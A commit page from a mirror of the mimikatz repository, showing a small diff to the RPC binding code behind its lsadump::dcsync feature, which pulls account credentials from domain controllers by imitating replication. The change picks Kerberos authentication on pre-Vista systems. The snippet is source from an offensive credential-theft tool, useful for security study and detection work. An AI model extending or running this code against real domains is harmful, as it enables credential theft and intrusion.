RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

lsadump::dcsync - XP and 2003 don't allow QueryContextAttributes for SECPKG_ATTR_SESSION_KEY when using NTLM protocol in userland, forcing Kerberos instead (Negociate otherwise). 

Thanks @asolino for letting me show!
This commit is contained in:
Benjamin DELPY 2015-08-24 12:21:52 +02:00
parent b2687e3085
commit ae041e0ece
1 changed files with 3 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/kull_m_rpc_drsr.c
View File

@ -64,19 +64,15 @@ BOOL kull_m_rpc_drsr_createBinding(LPCWSTR server, RPC_BINDING_HANDLE *hBinding)
{
RtlCopyMemory(fullServer, PREFIX_LDAP, szPrefix);
RtlCopyMemory((PBYTE) fullServer + (szPrefix - sizeof(wchar_t)), server, szServer);
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS); // in case of problem with session key on old OS: RPC_C_AUTHN_GSS_KERBEROS
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
if(status)
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_VISTA) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS);
if(rpcStatus == RPC_S_OK)
{
rpcStatus = RpcBindingSetOption(*hBinding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR) kull_m_rpc_drsr_RpcSecurityCallback);
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetOption: 0x%08x (%u)\n", rpcStatus, rpcStatus);
}
else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
LocalFree(fullServer);
}
}